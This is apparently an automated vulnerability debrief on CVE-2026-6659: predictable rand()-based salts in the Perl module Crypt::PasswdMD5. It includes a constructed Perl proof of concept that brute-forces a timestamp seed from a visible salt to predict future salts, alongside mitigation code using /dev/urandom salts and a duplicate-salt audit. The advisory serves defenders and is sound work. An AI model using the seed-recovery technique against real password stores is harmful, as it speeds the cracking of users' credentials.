PatchSiren cyber security CVE debrief
CVE-2026-6659 RSAVAGE CVE debrief
Crypt::PasswdMD5, a Perl module for md5-crypt style password hashing, generates salts with Perl's built-in rand() function in versions through 1.42. rand() is a general-purpose pseudo-random generator whose output is a deterministic function of its seed, so it is unsuitable for cryptographic use: an attacker who knows or can guess the seed can reproduce the salts the module issues, and a poorly seeded generator repeats salts across accounts. Predictable or repeated salts let an attacker precompute hash tables in advance and reuse cracking work across accounts, accelerating attacks on the stored hashes.
- Vendor: RSAVAGE
- Product: Crypt::PasswdMD5
- CVSS: HIGH 7.5
- CISA KEV: Not listed in stored evidence
- Original CVE published: 2026-05-08
- Original CVE updated: 2026-05-26
- Advisory published: 2026-05-08
- Advisory updated: 2026-05-26
Who should care
Organizations running Perl-based authentication, administrators who maintain legacy password stores in the $1$ (md5-crypt) or $apr1$ (Apache htpasswd) formats, security teams assessing cryptographic implementations, and developers of applications that call Crypt::PasswdMD5 without supplying their own salt.
Technical summary
Through version 1.42, Crypt::PasswdMD5 generates the salt for its MD5-based password hashes (the $1$ md5-crypt and $apr1$ Apache variants) with Perl's built-in rand() whenever the caller does not pass a salt of its own. rand() is a general-purpose PRNG, not a CSPRNG: its output is a deterministic function of a small internal state and it offers no resistance to prediction. This is CWE-338 (Use of Cryptographically Weak Pseudo-Random Number Generator). An attacker who knows or can brute-force the seed, for example when the application seeds the generator itself with a timestamp or process ID, can reproduce the salts a process has issued and will issue, which allows hash tables to be precomputed for accounts before they exist; a poorly seeded generator also hands the same salt to several accounts, so one cracking table serves all of them. Because the salt is stored in the clear beside the hash, predictability does not weaken an individual hash that already exists; the damage is that the salt no longer prevents precomputation and, when repeated, no longer forces per-account cracking work. The record scores this CVSS 3.1 7.5 (HIGH): network attack vector, low attack complexity, no privileges or user interaction required, confidentiality impact HIGH, integrity and availability impact NONE. The practical impact depends on whether the application seeds Perl's generator with a guessable value and whether it passes its own salt.
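The seed-recovery attack described above, as an added example that is neither the module's own code nor part of the advisory: a model of the rand()-based salt pattern, a constructed scenario in which the application has seeded Perl's generator with the account creation time (an assumption made for illustration; the advisory does not name any application that does this), and the attacker's brute force over a one-hour window of candidate seeds. In Perl 5.20 and later rand() is a drand48-style generator with 48 bits of state, so a salt sequence is fully determined by the seed; Perl seeds it from the OS when the application never calls srand(), which is why the example needs the low-entropy srand() assumption, but even then the generator is not designed to resist prediction. The names weak_salt and recover_seed are this example's own.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed model of the weak pattern: an 8-character salt drawn from the
# 64-character md5-crypt alphabet with Perl's built-in rand(). This mirrors
# the pattern the advisory describes; it is not the module's source.
my $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';

sub weak_salt {
    return join '', map { substr($itoa64, int(rand(64)), 1) } 1 .. 8;
}

# Hypothetical deployment (assumption for this example): the application seeds
# Perl's generator with the account creation time, then issues several salts.
my $creation_time = 1_778_000_000;            # constructed timestamp
srand($creation_time);
my @issued = map { weak_salt() } 1 .. 4;      # salts the application handed out

# Attacker's view: the first issued salt is visible in clear text beside the
# stored hash, and the creation time is known to within an hour, so there are
# only 3601 candidate seeds to try.
sub recover_seed {
    my ($known_salt, $lo, $hi) = @_;
    for my $seed ($lo .. $hi) {
        srand($seed);
        return $seed if weak_salt() eq $known_salt;
    }
    return;
}

my $seed = recover_seed($issued[0], $creation_time - 1800, $creation_time + 1800);
die "seed not recovered\n" unless defined $seed;

# With the seed, every later salt from the same generator is reproducible,
# including salts for accounts that have not been created yet.
srand($seed);
my @predicted = map { weak_salt() } 1 .. 4;
my $matches = grep { $issued[$_] eq $predicted[$_] } 0 .. $#issued;
printf "recovered seed %d; %d of %d issued salts reproduced\n",
    $seed, $matches, scalar @issued;
```

The brute force costs eight rand() calls per candidate seed, so a window of hours or days is still trivial; the example only needs the first salt to pin the seed, after which the whole sequence follows.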
Defensive priority
HIGH
Recommended defensive actions
- Upgrade to Crypt::PasswdMD5 1.43 or later, which replaces the rand()-based salt generation.
- If an immediate upgrade is not possible, generate the salt at the application layer from a cryptographically secure source (for example /dev/urandom) and pass it as the second argument to unix_md5_crypt() or apache_md5_crypt(); the module only falls back to rand() when no salt is supplied.
- Audit stores that hold hashes produced by affected versions. A hash cannot be re-salted without the plaintext, so re-hash with a fresh salt at each user's next successful login, and treat salts shared by more than one account as a sign the weak generator was also poorly seeded.
- Review every caller of Crypt::PasswdMD5 and confirm that the salt it uses is unpredictable and unique per account.
- Offline cracking of a stolen hash store leaves no trace in authentication logs; watch instead for the downstream signs of cracked credentials, such as successful logins from new locations or many accounts authenticating from one source, and force resets if the store is known to have leaked.
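The application-layer mitigation and the salt audit from the list above, as an added example that is not the module's or the advisory's own code: salts drawn from /dev/urandom (assumed present, as on Linux and the BSDs; Crypt::URandom would do elsewhere) and passed explicitly to unix_md5_crypt() and apache_md5_crypt() so the module's internal rand() path is never reached, a verify routine that reuses the stored string as the salt argument, and an audit helper that reports salts shared by more than one entry in a constructed sample store. The functions secure_salt, hash_password, verify_password and duplicate_salts are this example's own.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Crypt::PasswdMD5 qw(unix_md5_crypt apache_md5_crypt);

# Salt alphabet used by $1$ and $apr1$ strings.
my $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';

# Draw an 8-character salt from the kernel CSPRNG. Assumes a Unix-like system
# with /dev/urandom. The alphabet has exactly 64 entries, so the low six bits
# of each byte select a character uniformly with no modulo bias.
sub secure_salt {
    my ($len) = @_;
    $len = 8 unless defined $len && $len > 0 && $len <= 8;
    open my $fh, '<:raw', '/dev/urandom' or die "open /dev/urandom: $!";
    my $got = read $fh, my $bytes, $len;
    close $fh;
    die "short read from /dev/urandom\n" unless defined $got && $got == $len;
    return join '', map { substr($itoa64, ord($_) & 0x3f, 1) } split //, $bytes;
}

# Hash with an explicit salt so the module's own rand()-based path is never used.
sub hash_password {
    my ($password, $variant) = @_;
    $variant //= 'unix';
    my $salt = secure_salt(8);
    return $variant eq 'apache'
        ? apache_md5_crypt($password, $salt)
        : unix_md5_crypt($password, $salt);
}

# Verification: the stored string carries its own salt, so it is passed back as
# the salt argument; the module strips the magic prefix and the trailing hash.
sub verify_password {
    my ($password, $stored) = @_;
    my $recomputed = $stored =~ /^\$apr1\$/
        ? apache_md5_crypt($password, $stored)
        : unix_md5_crypt($password, $stored);
    return $recomputed eq $stored;
}

# Audit helper for an existing store: a salt shared by several entries is the
# visible symptom of a weak or re-seeded generator and marks those entries for
# re-hashing at the user's next login.
sub duplicate_salts {
    my (@hashes) = @_;
    my %seen;
    for my $h (@hashes) {
        next unless $h =~ /^\$(?:1|apr1)\$([^\$]{1,8})\$/;
        push @{ $seen{$1} }, $h;
    }
    my %dups = map { ($_ => $seen{$_}) } grep { @{ $seen{$_} } > 1 } keys %seen;
    return \%dups;
}

my $stored = hash_password('correct horse battery staple');
print "hash:   $stored\n";
print "verify: ", (verify_password('correct horse battery staple', $stored) ? 'ok' : 'FAIL'), "\n";
print "reject: ", (verify_password('wrong', $stored) ? 'FAIL' : 'ok'), "\n";

# Constructed sample entries; the hash parts are placeholders, only the salts
# matter to the audit.
my @sample = (
    '$1$abcdefgh$AAAAAAAAAAAAAAAAAAAAAA',
    '$1$abcdefgh$BBBBBBBBBBBBBBBBBBBBBB',
    '$apr1$zyxwvuts$CCCCCCCCCCCCCCCCCCCCCC',
);
my $dups = duplicate_salts(@sample);
for my $salt (sort keys %$dups) {
    printf "salt %s reused by %d entries\n", $salt, scalar @{ $dups->{$salt} };
}
```

The audit only detects repetition, not predictability: a salt stream from a weak generator that never repeats looks identical to a secure one, so the upgrade or the explicit salt path is still required for new hashes.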
Evidence notes
The vulnerability was disclosed on the oss-security mailing list on 2026-05-08. NVD records indicate the entry was last modified on 2026-05-26. The affected code is the salt generation routine of Crypt::PasswdMD5.pm at lines 35-47 in version 1.42. A fix was committed and released in version 1.43.
Official resources
- CVE-2026-6659 CVE record (CVE.org)
- CVE-2026-6659 NVD detail (NVD)
- Source item URL: nvd_modified
- Source reference: 9b29abf9-4ab0-4765-b253-1875cd9b441e
- Source reference: af854a3a-2127-422b-91ae-364da2661108 (2026-05-08T18:16:34.183Z)